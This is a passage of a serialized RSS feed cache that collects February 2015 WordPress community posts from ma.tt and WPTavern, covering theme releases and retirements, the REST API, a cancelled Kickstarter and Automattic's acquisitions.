book <a href=\"http://michaelpollan.com/books/the-omnivores-dilemma/\">Omnivore’s Dilemma</a>, on <a href=\"http://www.newyorker.com/magazine/2015/02/09/trip-treatment\">the reopened research on the potential therapeutic uses of psychedelics</a>. While we’re on Pollan it’s worth repeating his advice from <a href=\"http://michaelpollan.com/books/food-rules/\">Food Rules</a>, <strong>“Eat food, not too much, mostly plants.”</strong></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Feb 2015 00:54:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Ex Girlfriend Meeting\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44667\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/02/ex-girlfriend-meeting/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:350:\"<p>Since it’s Valentine’s day, here’s a little humor from the New Yorker’s Hallie Cantor: <a href=\"http://www.newyorker.com/humor/daily-shouts/imagine-boyfriends-ex-girlfriends-right-now\">What I Imagine My Boyfriend’s Ex-Girlfriends Are Doing Right Now</a>. (That the character is named Matt is completely coincidental.)</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 14 Feb 2015 18:20:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Mayer WordPress Theme is Now Open Source on GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38975\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/mayer-wordpress-theme-is-now-open-source-on-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5274:\"<p>Tom McFarlin released his <a href=\"https://github.com/pressware/mayer\" target=\"_blank\">Mayer WordPress theme on GitHub</a> today. The theme was designed with writers, bloggers, and authors in mind and was previously only <a href=\"https://theme.wordpress.com/themes/mayer/\" target=\"_blank\">available to WordPress.com users for $79</a>.</p>\n<p>Mayer is unique in that it was created to get users writing immediately, without having a bunch settings pages or additional widgets to configure. Content in the post editor is styled to match the front end, so users don’t need to leave the editor in order to see how it’s going to look.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/mayer-for-wordpress-1024x819.png\" rel=\"prettyphoto[38975]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/mayer-for-wordpress-1024x819.png?resize=1024%2C819\" alt=\"mayer-for-wordpress-1024x819\" class=\"aligncenter size-full wp-image-39004\" /></a></p>\n<p>Technically, the theme is already open source in terms of its licensing. However, up until this point, it was only distributed commercially via WordPress.com. McFarlin has written <a href=\"https://tommcfarlin.com/open-source-wordpress-themes/\" target=\"_blank\">several</a> <a href=\"https://tommcfarlin.com/mayer-for-wordpress-now-on-github/\" target=\"_blank\">posts</a> about how he came to the decision to make his products freely available on GitHub. He cites collaboration and accountability as the driving factors in his decision:</p>\n<p>“The advantage to this means that all of the work that the team and I have backlogged for this project (and for future projects) is publicly visible if for no other reason than for accountability,” he said. “Ideally though, we’d be able to benefit from the open source community that comes in the form of code reviews, pull requests, or just general conversations to help make the core product better.”</p>\n<h3>Free Products ≠ Free Support</h3>\n<p>Any theme or plugin author who decides to distribute a product for free will inevitably find the burden of support knocking at the door. It’s important to specify how much support, if any, is included for users who are receiving a product for free.</p>\n<p>“If the code itself falls under an open source license, then I’m willing to make the code freely available,” McFarlin said. <strong>“This does not mean that I’m willing to support the code base for those who haven’t paid, but that leads into an entirely different discussion.”</strong></p>\n<p>McFarlin will continue to sell the Mayer theme through his <a href=\"http://shop.pressware.co/mayer/\" target=\"_blank\">Pressware shop</a>. The $99/year price tag offers users professional support for a year.</p>\n<p>“To be clear, I’m not attempting yet-another-way to monetize or popularize a theme in hopes of making money,” McFarlin said. “The short of it is that the theme will sell given the right marketplace. If someone wants to freely use the theme, that’s fine – why not? After all, it may result in some pull requests or other issues that will improve the core theme.”</p>\n<p>Based on his experience navigating user expectations from open source software, McFarlin believes that there is no escaping the issue of support.</p>\n<p>“<span class=\"pullquote alignleft\">I think that if you’re in the business of WordPress products (versus services), you’re in the support business whether you intend to be or not.</span> Everything that you release – regardless of where the transaction actually happens – is going to yield support from some of the customers,” he said.</p>\n<p>“In order to gain access to said support, the transaction just moves back one step from after accessing the source code rather than before accessing the source code.”</p>\n<p>This model is almost entirely the opposite of the larger theme marketplaces, such as Themeforest, where the customer has no option to preview the code or have a developer preview the code before purchasing the product. It’s essentially a blind purchase in hopes that you won’t have to ask for too much support.</p>\n<p>McFarlin is banking on the fact that users who need professional support will be willing to pay for it. <a href=\"http://themehybrid.com/\" target=\"_blank\">Theme Hybrid</a> is one notable shop that has pioneered this model for years, offering all of its open source products for free and charging for paid support. WordPress.com does something similar, with many of its free themes mirrored on WordPress.org. Pressware is moving in a similar direction and will be creating a products division to further experiment with the model. McFarlin plans to put more work up on GitHub in the future and will continue to write about his experience.</p>\n<p>The vast majority of WordPress theme developers have not experimented with this distribution model. For the most part, theme shops sell their products and free versions, if offered, are only available with a limited set of features. McFarlin hopes to prove that in an open source marketplace, a business can successfully sell support for a product that it’s already giving away for free.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Feb 2015 23:56:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Excellent Primer on the WordPress REST API Project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=39010\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/excellent-primer-on-the-wordpress-rest-api-project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1981:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/WordPressRestAPIPrimerFeaturedImage.png\" rel=\"prettyphoto[39010]\"><img class=\"size-full wp-image-39017\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/WordPressRestAPIPrimerFeaturedImage.png?resize=655%2C327\" alt=\"Rest API Primer Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/22280677@N07/3349296482\">The Poor Man’s Racehorse?</a> – <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">(license)</a>\n<p>In the past two years, there’s been a lot of discussion surrounding the <a title=\"https://github.com/WP-API/WP-API\" href=\"https://github.com/WP-API/WP-API\">WordPress REST API project</a>. If you’re not familiar with it, Brian Krogsgard <a title=\"https://poststatus.com/wordpress-json-rest-api/\" href=\"https://poststatus.com/wordpress-json-rest-api/\">published a great article</a> that explains what it is, how to get involved, and the possibilities it opens up to developers. Krogsgard believes the REST API is “the most exciting project for the platform since custom post types were introduced in WordPress 2.9 and 3.0.”</p>\n<p>While the article does a good job explaining what the API is, I find it to be developer heavy for my understanding. I think it’s a project that I won’t truly understand how great it is until I use products built with it.</p>\n<p>For additional information, read our <a title=\"http://wptavern.com/ryan-mccue-on-creating-the-json-rest-api-for-wordpress\" href=\"http://wptavern.com/ryan-mccue-on-creating-the-json-rest-api-for-wordpress\">interview from 2013 with Ryan McCue</a>, project lead for the WordPress REST API. In the interview, McCue explains why the API is such a big deal and lists a few practical use cases. There’s also a great presentation from WordCamp San Francisco 2014 by Sam Hotchkiss, that explains how APIs like the REST API are changing the internet.</p>\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Feb 2015 22:46:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"WPTavern: HeroPress Fails to Attract Backers, Cancels Kickstarter Campaign Ahead of Deadline\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38963\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://wptavern.com/heropress-fails-to-attract-backers-cancels-kickstarter-campaign-ahead-of-deadline\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2467:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/heropress-funding-canceled.jpg\" rel=\"prettyphoto[38963]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/heropress-funding-canceled.jpg?resize=1008%2C392\" alt=\"heropress-funding-canceled\" class=\"aligncenter size-full wp-image-38973\" /></a></p>\n<p>Topher DeRosia, creator of <a href=\"http://wptavern.com/heropress-launches-kickstarter-campaign-to-highlight-wordpress-developers\" target=\"_blank\">HeroPress</a>, <a href=\"http://heropress.com/cancelling-kickstarter-1/\" target=\"_blank\">announced</a> today that he is canceling the project’s Kickstarter campaign. During the past few weeks, the project attracted 33 backers who pledged $21,855 of the $60,000 AUD goal. When it became clear that the fundraiser was hopelessly behind on reaching its goal, DeRosia canceled the funding three days ahead of its deadline.</p>\n<blockquote><p>The Kickstarter contributors were great. The verbal and public support of people were wonderful. And lastly the naysayers were welcome and useful. With very few exceptions our detractors enhanced what we were doing, and I appreciate it.</p></blockquote>\n<p>HeroPress encountered no small amount of resistance from those who either didn’t support the concept or didn’t appreciate the approach. The project’s mission was to “develop the WordPress heroes of the world by sharing the accumulated wisdom of the community.” HeroPress’ communication strategy failed to communicate the mission of the project and struggled to identify practical goals, apart from creating videos to inspire community members.</p>\n<p>DeRosia attempted to further clarify the mission of the project through <a href=\"https://www.kickstarter.com/projects/heropress/heropress-developing-the-wordpress-heroes-of-the-w/posts\" target=\"_blank\">short interviews with potential speakers</a> and supporters. Unfortunately, the video updates didn’t adequately represent the quality of videos that the HeroPress creator hoped to deliver on his $60,000 AUD budget for the project.</p>\n<p>“Our plan at this point is to huddle and make a new plan and give it another shot,” DeRosia said. “We’ve learned an enormous amount about our audience, their needs, and our capabilities.” He plans to continue HeroPress with a new, more cost-effective approach that will better address the needs the project was created to solve.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Feb 2015 20:19:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WPTavern: DevPress Retires Its Best Selling Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38968\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wptavern.com/devpress-retires-its-best-selling-theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4439:\"<p>Devin Price, who owns and operates the WordPress commercial theme shop <a title=\"https://devpress.com/\" href=\"https://devpress.com/\">DevPress</a>, <a title=\"https://devpress.com/zelda-released-zenith-retired/\" href=\"https://devpress.com/zelda-released-zenith-retired/\">announced</a> that he is retiring his best selling theme, <a title=\"https://devpress.com/demo/zenith\" href=\"https://devpress.com/demo/zenith\">Zenith</a>. I asked Price why he’s retiring his best product.</p>\n<p>“Retirement may not be the best term. It’s more like introducing the new year’s model and stopping production on the previous one. The designs match pretty close, but there were a lot of under the hood updates I wanted to do that would have broken child themes and created compatibility issues for existing customers.”</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/DevPressZeldaTheme.png\" rel=\"prettyphoto[38968]\"><img class=\"size-full wp-image-38970\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/DevPressZeldaTheme.png?resize=880%2C660\" alt=\"Zelda Replaces Zenith\" /></a>Zelda Replaces Zenith\n<p>The HTML markup in Zelda is almost entirely rewritten. “If I was a customer who had spent hours making customizations through a child theme, I would be sorely disappointed when I clicked that auto-update button. Whereas, introducing a new version let’s the user decide whether to switch or not.” Price said. He plans on supporting Zenith for another year to give customers an opportunity to decide whether or not to switch to the new theme.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThemeRetirement.png\" rel=\"prettyphoto[38968]\"><img class=\"size-full wp-image-38982\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThemeRetirement.png?resize=650%2C200\" alt=\"Theme Retirement\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/120360673@N04/13856166954\">Retirement Calendar</a> – <a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">(license)</a>\n<p>Price <a title=\"https://tommcfarlin.com/planned-obsolescence-of-wordpress-themes/#comment-799966\" href=\"https://tommcfarlin.com/planned-obsolescence-of-wordpress-themes/#comment-799966\">gives more insight</a> into his strategy within the comments of an article written by Tom McFarlin on <a title=\"https://tommcfarlin.com/planned-obsolescence-of-wordpress-themes/\" href=\"https://tommcfarlin.com/planned-obsolescence-of-wordpress-themes/\">planned obsolescence of WordPress themes</a>.</p>\n<blockquote><p>I think planned obsolescence or ‘theme retirement’ is a really good option for theme shops. Big updates (like converting a theme to be responsive, or using new development techniques like icon fonts) is sometimes really difficult to do in a way that won’t break child themes.</p>\n<p>We’re using a mix of the ‘Fork It’ and ‘Retire It’ options at DevPress. The ‘Cascade’ theme will become ‘Cascadia’ (for example) and we’ll make the new theme available for free to all customers who purchased the free version. Less popular themes will just be retired as we add new themes to take their place.</p></blockquote>\n<p>Although theme shops are able to retire themes and set up redirects to newer versions, retiring a theme is not as easy to do on the WordPress theme directory. According to Price, “You can request a takedown and release a theme under a different name, but there’s no way to 301 redirect the established traffic to the new spot.” Not only does a theme author lose traffic, but they also can’t push out critical updates for retired themes.</p>\n<p>DevPress isn’t the first theme shop to use a retirement strategy. Since 2012, WooThemes has <a title=\"http://docs.woothemes.com/document/retired-themes/\" href=\"http://docs.woothemes.com/document/retired-themes/\">retired 92</a> themes. Array also <a title=\"https://array.is/theme-retirement/\" href=\"https://array.is/theme-retirement/\">retires themes</a>, but offers them for free with no support. A theme retirement strategy makes sense from a business perspective, but as a customer, I expect themes I buy to stick around for a year or more.</p>\n<p>As a customer, what do you think about commercial theme companies retiring themes? For commercial theme shops, how does such a strategy help your business?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Feb 2015 20:13:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Passing of David Carr\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44692\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/02/passing-of-david-carr/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:330:\"<p>Shocked and dismayed this morning on the news that David Carr passed last night after collapsing in the New York Times newsroom, where he was working into the evening. If you’re not familiar with his work or legacy, <a href=\"http://mediagazer.com/150212/p36#a150212p36\">these links on Mediagazer are a good start</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Feb 2015 16:04:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: A Look Back at 16 Automattic Acquisitions Since 2007\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38863\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/a-look-back-at-16-automattic-acquisitions-since-2007\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:23673:\"<p>Since <a title=\"http://automattic.com/\" href=\"http://automattic.com/\">Automattic</a> was founded in 2005, it has acquired several businesses, services, products, and people. In August, the company will be 10 years old and I thought it would be interesting to see if the acquisitions the company has made are still around. The list is organized from earliest to latest.</p>\n<h2>Gravatar</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/03/GravatarLogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-18453 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/03/GravatarLogo.png?resize=239%2C63\" alt=\"Gravatar Logo 2\" /></a> <a title=\"http://en.gravatar.com/\" href=\"http://en.gravatar.com/\">Gravatar</a> stands for globally recognized avatar and is an image that follows you around on the web. This eliminates the hassle of maintaining a visual identity across multiple communities. In 2014, what was supposed to be a Gravatar mobile app, <a title=\"http://wptavern.com/automattics-planned-gravatar-app-morphs-into-a-selfies-app-for-android\" href=\"http://wptavern.com/automattics-planned-gravatar-app-morphs-into-a-selfies-app-for-android\">morphed into a Selfies app for Android</a>. Although Gravatar is supported in a number of applications, I think there’s still a lot of work to do before it becomes a globally recognized image. Gravatar was created by Tom Werner and <a title=\"http://blog.gravatar.com/2007/10/18/automattic-gravatar/\" href=\"http://blog.gravatar.com/2007/10/18/automattic-gravatar/\">acquired in 2007</a>.</p>\n<h2>BuddyPress Acqui-hire</h2>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2009/04/buddypresslogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-966 size-full\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2009/04/buddypresslogo.png?resize=212%2C76\" alt=\"BuddyPress Logo\" /></a><a title=\"https://buddypress.org/\" href=\"https://buddypress.org/\">BuddyPress</a> was conceived <a title=\"https://buddypress.org/about/story/\" href=\"https://buddypress.org/about/story/\">in 2008</a> by Andy Peatling and started out as a set of plugins to add social networking features to WordPress MU (multi-user). In March of 2008, Peatling was <a title=\"http://ma.tt/2008/03/backing-buddypress/\" href=\"http://ma.tt/2008/03/backing-buddypress/\">acqui-hired by Automattic</a> and joined the company as an employee. Peatling is not as active in BuddyPress core development, but thanks to John James Jacoby and the community surrounding it, it’s still an actively developed project. BuddyPress 2.2 <a title=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\" href=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\">was released in February and </a>features a new member type API and several bug fixes.</p>\n<h2>IntenseDebate</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2009/08/intensedebatelogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-2326 size-full\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2009/08/intensedebatelogo.png?resize=189%2C43\" alt=\"IntenseDebate Logo\" /></a><a title=\"http://intensedebate.com/home\" href=\"http://intensedebate.com/home\">IntenseDebate</a> is a third-party commenting service that showed a lot of promise of being a premiere service to replace the native commenting system in WordPress. It synced comments from the service to the local database to ensure no comments were lost. The service <a title=\"http://blog.intensedebate.com/2009/03/05/introducing-intensedebate-plugins-add-the-features-you-want/\" href=\"http://blog.intensedebate.com/2009/03/05/introducing-intensedebate-plugins-add-the-features-you-want/\">introduced</a> a <a title=\"http://intensedebate.com/plugins\" href=\"http://intensedebate.com/plugins\">plugin eco-system</a> in 2009, that I think if given more time, would have helped the service fly past the competition. Unfortunately, development on the service came to a halt somewhere <a title=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\" href=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\">between 2012 and 2013</a>.</p>\n<p>IntenseDebate was founded by Isaac Keyet and Jon Fox in 2006 and was <a title=\"http://ma.tt/2008/09/intense-debate-goes-automattic/\" href=\"http://ma.tt/2008/09/intense-debate-goes-automattic/\">acquired by Automattic</a> in 2008.</p>\n<h2>Polldaddy</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2010/02/polldaddylogo2.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-full wp-image-3334\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2010/02/polldaddylogo2.png?resize=242%2C56\" alt=\"polldaddylogo2\" /></a><a title=\"https://polldaddy.com/\" href=\"https://polldaddy.com/\">Polldaddy</a> is a platform agnostic service that lets users create surveys and polls. Polldaddy was founded in 2006 by David Lenehan in Sligo, Ireland and was <a title=\"http://blog.polldaddy.com/2008/10/15/automattic-acquires-polldaddy/\" 